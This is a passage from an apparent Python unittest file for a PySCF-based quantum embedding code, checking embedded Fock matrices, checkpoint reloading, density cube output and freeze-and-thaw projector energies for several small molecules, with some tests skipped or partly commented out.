test_fock2 = [full_fock[0][np.ix_(s2s[1], s2s[1])], full_fock[1][np.ix_(s2s[1], s2s[1])]]
self.assertTrue(np.allclose(test_fock1[0], supersystem.subsystems[0].emb_fock[0]))
self.assertTrue(np.allclose(test_fock1[1], supersystem.subsystems[0].emb_fock[1]))
self.assertTrue(np.allclose(test_fock2[0], supersystem.subsystems[1].emb_fock[0]))
self.assertTrue(np.allclose(test_fock2[1], supersystem.subsystems[1].emb_fock[1]))
def test_save_read_chkfile(self):
t_file = tempfile.NamedTemporaryFile()
hl_method = 'ccsd'
#Closed Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method, filename=t_file.name)
mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
old_dmat = supersystem.fs_dmat
old_sub1_dmat = supersystem.subsystems[0].get_dmat()
old_sub2_dmat = supersystem.subsystems[1].get_dmat()
supersystem2 = cluster_supersystem.ClusterSuperSystem([copy(subsys), copy(subsys2)], self.env_method, fs_scf_obj, init_guess='chk', filename=t_file.name)
supersystem2.init_density()
new_dmat = supersystem2.fs_dmat
new_sub1_dmat = supersystem2.subsystems[0].get_dmat()
new_sub2_dmat = supersystem2.subsystems[1].get_dmat()
self.assertTrue(np.equal(old_dmat, new_dmat).all)
self.assertTrue(np.equal(old_sub1_dmat, new_sub1_dmat).all)
self.assertTrue(np.equal(old_sub2_dmat, new_sub2_dmat).all)
#Unrestricted
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
supersystem.init_density()
old_dmat = supersystem.fs_dmat
old_sub1_dmat = supersystem.subsystems[0].get_dmat()
old_sub2_dmat = supersystem.subsystems[1].get_dmat()
supersystem2 = cluster_supersystem.ClusterSuperSystem([copy(subsys), copy(subsys2)], self.env_method, fs_scf_obj, init_guess='chk', filename=t_file.name, unrestricted=True)
supersystem2.init_density()
new_dmat = supersystem2.fs_dmat
new_sub1_dmat = supersystem2.subsystems[0].get_dmat()
new_sub2_dmat = supersystem2.subsystems[1].get_dmat()
self.assertTrue(np.equal(old_dmat, new_dmat).all)
self.assertTrue(np.equal(old_sub1_dmat, new_sub1_dmat).all)
self.assertTrue(np.equal(old_sub2_dmat, new_sub2_dmat).all)
#Restricted Open Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
old_dmat = supersystem.fs_dmat
old_sub1_dmat = supersystem.subsystems[0].get_dmat()
old_sub2_dmat = supersystem.subsystems[1].get_dmat()
supersystem2 = cluster_supersystem.ClusterSuperSystem([copy(subsys), copy(subsys2)], self.env_method, fs_scf_obj, init_guess='chk', filename=t_file.name)
supersystem2.init_density()
new_dmat = supersystem2.fs_dmat
new_sub1_dmat = supersystem2.subsystems[0].get_dmat()
new_sub2_dmat = supersystem2.subsystems[1].get_dmat()
self.assertTrue(np.equal(old_dmat, new_dmat).all)
self.assertTrue(np.equal(old_sub1_dmat, new_sub1_dmat).all)
self.assertTrue(np.equal(old_sub2_dmat, new_sub2_dmat).all)
@unittest.skip
def test_save_ft_density(self):
from pyscf.tools import cubegen
t_file = tempfile.NamedTemporaryFile()
hl_method = 'ccsd'
#Closed Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method, filename=t_file.name)
mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.freeze_and_thaw()
supersystem.save_ft_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
nS = supersystem.mol.nao_nr()
dm_env = [np.zeros((nS, nS)), np.zeros((nS, nS))]
for i in range(len(supersystem.subsystems)):
dm_env[0][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[0]
dm_env[1][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[1]
sup_dmat = dm_env[0] + dm_env[1]
cubegen.density(supersystem.mol.copy(), true_ftmp.name, sup_dmat)
with open(t_file.name + '_' + chkfile_index + '_ft.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
#Unrestricted
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.freeze_and_thaw()
supersystem.save_ft_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
nS = supersystem.mol.nao_nr()
dm_env = [np.zeros((nS, nS)), np.zeros((nS, nS))]
for i in range(len(supersystem.subsystems)):
dm_env[0][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[0]
dm_env[1][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[1]
cubegen.density(supersystem.mol.copy(), true_ftmp.name, dm_env[0])
with open(t_file.name + '_' + chkfile_index + '_ft_alpha.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
cubegen.density(supersystem.mol.copy(), true_ftmp.name, dm_env[1])
with open(t_file.name + '_' + chkfile_index + '_ft_beta.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
#Restricted open shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.freeze_and_thaw()
supersystem.save_ft_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
nS = supersystem.mol.nao_nr()
dm_env = [np.zeros((nS, nS)), np.zeros((nS, nS))]
for i in range(len(supersystem.subsystems)):
dm_env[0][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[0]
dm_env[1][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[1]
cubegen.density(supersystem.mol.copy(), true_ftmp.name, dm_env[0])
with open(t_file.name + '_' + chkfile_index + '_ft_alpha.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
cubegen.density(supersystem.mol.copy(), true_ftmp.name, dm_env[1])
with open(t_file.name + '_' + chkfile_index + '_ft_beta.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
@unittest.skip
def test_save_ft_spin_density(self):
from pyscf.tools import cubegen
hl_method = 'ccsd'
t_file = tempfile.NamedTemporaryFile()
#Unrestricted
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.freeze_and_thaw()
supersystem.save_ft_spin_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
nS = supersystem.mol.nao_nr()
dm_env = [np.zeros((nS, nS)), np.zeros((nS, nS))]
for i in range(len(supersystem.subsystems)):
dm_env[0][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[0]
dm_env[1][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[1]
cubegen.density(supersystem.mol.copy(), true_ftmp.name, np.subtract(dm_env[0], dm_env[1]))
with open(t_file.name + '_' + chkfile_index + '_ft_spinden.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
#Restricted open shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.freeze_and_thaw()
supersystem.save_ft_spin_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
nS = supersystem.mol.nao_nr()
dm_env = [np.zeros((nS, nS)), np.zeros((nS, nS))]
for i in range(len(supersystem.subsystems)):
dm_env[0][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[0]
dm_env[1][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[1]
cubegen.density(supersystem.mol.copy(), true_ftmp.name, np.subtract(dm_env[0], dm_env[1]))
with open(t_file.name + '_' + chkfile_index + '_ft_spinden.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
@unittest.skip
def test_freeze_and_thaw(self):
#Restricted closed shell
#Supermolecular test.
mol = gto.Mole()
mol.verbose = 3
mol.atom = '''
C 0.7710806955 -0.0001048861 0.0000400510
H 1.1560846512 0.8695663320 -0.5203105003
H 1.1560491322 0.0161891484 1.0133671125
H 1.1560865179 -0.8856013435 -0.4928324985
ghost:C -0.7713511096 -0.0001546299 -0.0000054393
ghost:H -1.1561315704 0.8855266211 0.4927506464
ghost:H -1.1560645399 -0.0160685116 -1.0134290757
ghost:H -1.1560647411 -0.8697976282 0.5205503870
'''
mol.basis = 'cc-pVDZ'
mol.charge = -1
mol.build()
env_method = 'pbe'
active_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
ghost:C 0.7710806955 -0.0001048861 0.0000400510
ghost:H 1.1560846512 0.8695663320 -0.5203105003
ghost:H 1.1560491322 0.0161891484 1.0133671125
ghost:H 1.1560865179 -0.8856013435 -0.4928324985
C -0.7713511096 -0.0001546299 -0.0000054393
H -1.1561315704 0.8855266211 0.4927506464
H -1.1560645399 -0.0160685116 -1.0134290757
H -1.1560647411 -0.8697976282 0.5205503870
'''
mol2.basis = 'cc-pVDZ'
mol2.charge = 1
mol2.build()
env_method = 'pbe'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, max_cycle=25, diis_num=1)
supersystem.init_density()
supersystem.freeze_and_thaw()
supersystem.get_env_in_env_energy()
supersystem.get_supersystem_energy()
projector_energy = np.trace(np.dot(subsys.env_dmat[0], supersystem.proj_pot[0][0]))
projector_energy += np.trace(np.dot(subsys.env_dmat[1], supersystem.proj_pot[0][1]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[0], supersystem.proj_pot[1][0]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[1], supersystem.proj_pot[1][1]))
self.assertAlmostEqual(0.0, projector_energy, delta=1e-10)
sup_e = supersystem.get_env_in_env_energy()
test_e = supersystem.get_supersystem_energy()
self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
#Long distance test.
mol = gto.Mole()
mol.verbose = 3
mol.atom = '''
H 0.74 0. 0.
H 0. 0. 0.
'''
mol.basis = '3-21g'
mol.build()
env_method = 'm06'
active_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
H 11.48 0.0 0.0
H 12.22 0.0 0.0
'''
mol2.basis = '3-21g'
mol2.build()
env_method = 'm06'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
supersystem.freeze_and_thaw()
projector_energy = np.trace(np.dot(subsys.env_dmat[0], supersystem.proj_pot[0][0]))
projector_energy += np.trace(np.dot(subsys.env_dmat[1], supersystem.proj_pot[0][1]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[0], supersystem.proj_pot[1][0]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[1], supersystem.proj_pot[1][1]))
self.assertAlmostEqual(0.0, projector_energy, delta=1e-15)
mol3 = gto.Mole()
mol3.verbose = 3
mol3.atom ='''
H 0.74 0. 0.
H 0. 0. 0.
H 11.48 0.0 0.0
H 12.22 0.0 0.0
'''
mol3.basis = '3-21g'
mol3.build()
mf = dft.RKS(mol3)
mf.xc = 'm06'
mf.kernel()
test_dmat = mf.make_rdm1()
test_e = mf.energy_tot()
sup_e = supersystem.get_env_in_env_energy()
self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
#Projection energy
mol = gto.Mole()
mol.verbose = 3
mol.atom = '''
H 0.74 0. 0.
H 0. 0. 0.
'''
mol.basis = '3-21g'
mol.build()
env_method = 'm06'
active_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
H 1.48 0.0 0.0
H 2.22 0.0 0.0
'''
mol2.basis = '3-21g'
mol2.build()
env_method = 'm06'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', fs_scf_obj, init_guess='supmol')
supersystem.init_density()
initial_projector_energy = 0.0
initial_projector_energy = np.trace(np.dot(subsys.env_dmat[0], supersystem.proj_pot[0][0]))
initial_projector_energy += np.trace(np.dot(subsys.env_dmat[1], supersystem.proj_pot[0][1]))
initial_projector_energy += np.trace(np.dot(subsys2.env_dmat[0], supersystem.proj_pot[1][0]))
initial_projector_energy += np.trace(np.dot(subsys2.env_dmat[1], supersystem.proj_pot[1][1]))
supersystem.freeze_and_thaw()
projector_energy = np.trace(np.dot(subsys.env_dmat[0], supersystem.proj_pot[0][0]))
projector_energy += np.trace(np.dot(subsys.env_dmat[1], supersystem.proj_pot[0][1]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[0], supersystem.proj_pot[1][0]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[1], supersystem.proj_pot[1][1]))
self.assertGreaterEqual(0.0, projector_energy-initial_projector_energy)
# Unrestricted Open Shell
###Supermolecular test.
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#C 1.3026 9.2236 -0.0001
#F 2.3785 10.1081 0.0001
#H 1.3873 8.5867 -0.8899
#H 1.3873 8.5862 0.8894
#ghost:C -0.0002 9.9997 0.0001
#ghost:H -0.8544 9.3128 -0.0001
#ghost:H -0.0683 10.6366 0.8880
#ghost:H -0.0683 10.6370 -0.8875
#'''
#mol.basis = 'cc-pVDZ'
#mol.spin = 1
#mol.build()
#env_method = 'hf'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, unrestricted=True, hl_unrestricted=True)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
ghost:C 1.3026 9.2236 -0.0001
ghost:F 2.3785 10.1081 0.0001
ghost:H 1.3873 8.5867 -0.8899
ghost:H 1.3873 8.5862 0.8894
C -0.0002 9.9997 0.0001
H -0.8544 9.3128 -0.0001
H -0.0683 10.6366 0.8880
H -0.0683 10.6370 -0.8875
'''
mol2.basis = 'cc-pVDZ'
mol2.spin = -1
mol2.build()
env_method = 'hf'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, unrestricted=True)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'hf', fs_scf_obj, unrestricted=True, diis_num=1, max_cycle=100)
supersystem.init_density()
supersystem.freeze_and_thaw()
projector_energy = subsys.get_env_proj_e()
projector_energy += subsys2.get_env_proj_e()
self.assertAlmostEqual(0.0, projector_energy, delta=1e-12)
#test_dmat = supersystem.get_emb_dmat()
#true_dmat = supersystem.fs_scf.make_rdm1()
#test_e = supersystem.get_supersystem_energy()
#sup_e = supersystem.get_env_in_env_energy()
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
###Long distance test.
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#O 0. 0. 0.
#O 1.13 0. 0.
#'''
#mol.basis = '3-21g'
#mol.spin = 2
#mol.build()
#nv_method = 'm06'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, unrestricted=True, hl_unrestricted=True)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
O 0. 100.0 0.0
O 1.13 100.0 0.0
'''
mol2.basis = '3-21g'
mol2.spin = 2
mol2.build()
env_method = 'm06'
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', fs_scf_obj, init_guess='supmol')
supersystem.init_density()
supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertAlmostEqual(0.0, projector_energy, delta=1e-14)
#mol3 = gto.Mole()
#mol3.verbose = 3
#mol3.atom ='''
#O 0. 0. 0.
#O 1.13 0. 0.
#O 0. 100.0 0.0
#O 1.13 100.0 0.0
#'''
#mol3.basis = '3-21g'
#mol3.spin = 4
#mol3.build()
#mf = dft.UKS(mol3)
#mf.xc = 'm06'
#mf.grids = supersystem.fs_scf.grids
#mf.max_cycle = 1000
#mf.kernel()
#test_dmat = mf.make_rdm1()
#test_e = mf.energy_tot()
#sup_e = supersystem.get_env_in_env_energy()
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
##Projection energy
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#Li 0. 0. 0.
#'''
#mol.basis = 'cc-pVDZ'
#mol.spin = 1
#mol.build()
#env_method = 'm06'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, unrestricted=True, hl_unrestricted=True)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
H 1.595 0.0 0.0
'''
mol2.basis = 'cc-pVDZ'
mol2.spin = -1
mol2.build()
env_method = 'm06'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, unrestricted=True)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', fs_scf_obj, unrestricted=True, init_guess='supmol')
supersystem.init_density()
#initial_projector_energy = 0.0
#initial_projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#initial_projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#initial_projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#initial_projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertGreaterEqual(0.0, projector_energy-initial_projector_energy)
##Localized Spin
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
# ghost.C -2.95182400 -0.40708300 0.00000200
# ghost.H -2.94830500 -1.05409800 -0.87975500
# ghost.H -2.94830300 -1.05410200 0.87975600
# ghost.H -3.88904200 0.14923700 0.00000400
# C 0.74345800 0.66525400 0.00000100
# H 0.75917800 1.30099000 -0.88423600
# H 0.75918100 1.30098600 0.88424000
# C -0.44163200 -0.26055200 0.00000000
# H -0.39317700 -0.91474400 -0.87593000
# H -0.39317500 -0.91474700 0.87592800
# C -1.74853900 0.51173600 0.00000300
# H -1.78059900 1.17041100 0.87438300
# H -1.78060000 1.17041500 -0.87437400'''
#mol.basis = 'cc-pVDZ'
#mol.spin = 1
#mol.charge = -1
#mol.build()
#env_method = 'm06'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, unrestricted=True, hl_unrestricted=True)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
C -2.95182400 -0.40708300 0.00000200
H -2.94830500 -1.05409800 -0.87975500
H -2.94830300 -1.05410200 0.87975600
H -3.88904200 0.14923700 0.00000400
ghost.C 0.74345800 0.66525400 0.00000100
ghost.H 0.75917800 1.30099000 -0.88423600
ghost.H 0.75918100 1.30098600 0.88424000
ghost.C -0.44163200 -0.26055200 0.00000000
ghost.H -0.39317700 -0.91474400 -0.87593000
ghost.H -0.39317500 -0.91474700 0.87592800
ghost.C -1.74853900 0.51173600 0.00000300
ghost.H -1.78059900 1.17041100 0.87438300
ghost.H -1.78060000 1.17041500 -0.87437400'''
mol2.basis = 'cc-pVDZ'
mol2.charge = 1
mol2.build()
env_method = 'm06'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, unrestricted=True)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', fs_scf_obj, diis_num=1, unrestricted=True)
supersystem.init_density()
supersystem.freeze_and_thaw()
projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertAlmostEqual(0.0, projector_energy, delta=1e-15)
mol3 = gto.Mole()
mol3.atom ='''
C 0.74345800 0.66525400 0.00000100
H 0.75917800 1.30099000 -0.88423600
H 0.75918100 1.30098600 0.88424000
C -0.44163200 -0.26055200 0.00000000
H -0.39317700 -0.91474400 -0.87593000
H -0.39317500 -0.91474700 0.87592800
C -1.74853900 0.51173600 0.00000300
H -1.78059900 1.17041100 0.87438300
H -1.78060000 1.17041500 -0.87437400
C -2.95182400 -0.40708300 0.00000200
H -2.94830500 -1.05409800 -0.87975500
H -2.94830300 -1.05410200 0.87975600
H -3.88904200 0.14923700 0.00000400
'''
mol3.basis = 'cc-pVDZ'
mol3.spin = 1
mol3.build()
mf = dft.UKS(mol3)
mf.xc = 'm06'
grids = supersystem.fs_scf.grids
mf.grids = grids
mf.kernel()
test_e = mf.energy_tot()
sup_e = supersystem.get_env_in_env_energy()
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
# Restricted Open Shell
#Localized Spin
mol = gto.Mole()
mol.verbose = 3
mol.atom = '''
C 0.74345800 0.66525400 0.00000100
H 0.75917800 1.30099000 -0.88423600
H 0.75918100 1.30098600 0.88424000
ghost.C -0.44163200 -0.26055200 0.00000000
ghost.H -0.39317700 -0.91474400 -0.87593000
ghost.H -0.39317500 -0.91474700 0.87592800
ghost.C -1.74853900 0.51173600 0.00000300
ghost.H -1.78059900 1.17041100 0.87438300
ghost.H -1.78060000 1.17041500 -0.87437400
ghost.H -2.95182400 -0.40708300 0.00000200'''
mol.basis = '6-31g'
mol.spin = 1
mol.charge = -1
mol.build()
env_method = 'm06'
active_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, hl_unrestricted=True)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
ghost.C 0.74345800 0.66525400 0.00000100
ghost.H 0.75917800 1.30099000 -0.88423600
ghost.H 0.75918100 1.30098600 0.88424000
C -0.44163200 -0.26055200 0.00000000
H -0.39317700 -0.91474400 -0.87593000
H -0.39317500 -0.91474700 0.87592800
C -1.74853900 0.51173600 0.00000300
H -1.78059900 1.17041100 0.87438300
H -1.78060000 1.17041500 -0.87437400
H -2.95182400 -0.40708300 0.00000200'''
mol2.basis = '6-31g'
mol2.charge = 1
mol2.build()
env_method = 'm06'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', fs_scf_obj, max_cycle=200, diis_num=1, damp=0.4)
supersystem.init_density()
supersystem.freeze_and_thaw()
projector_energy = subsys.get_env_proj_e()
projector_energy += subsys2.get_env_proj_e()
self.assertAlmostEqual(0.0, projector_energy, delta=1e-15)
mol3 = gto.Mole()
mol3.atom ='''
C 0.74345800 0.66525400 0.00000100
H 0.75917800 1.30099000 -0.88423600
H 0.75918100 1.30098600 0.88424000
C -0.44163200 -0.26055200 0.00000000
H -0.39317700 -0.91474400 -0.87593000
H -0.39317500 -0.91474700 0.87592800
C -1.74853900 0.51173600 0.00000300
H -1.78059900 1.17041100 0.87438300
H -1.78060000 1.17041500 -0.87437400
H -2.95182400 -0.40708300 0.00000200
'''
mol3.basis = '6-31g'
mol3.spin = 1
mol3.build()
mf = dft.ROKS(mol3)
mf.xc = 'm06'
grids = supersystem.fs_scf.grids
mf.grids = grids
mf.kernel()
test_e = mf.energy_tot()
sup_e = supersystem.get_env_in_env_energy()
self.assertAlmostEqual(test_e, sup_e, delta=1e-7)
#Supermolecular test.
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
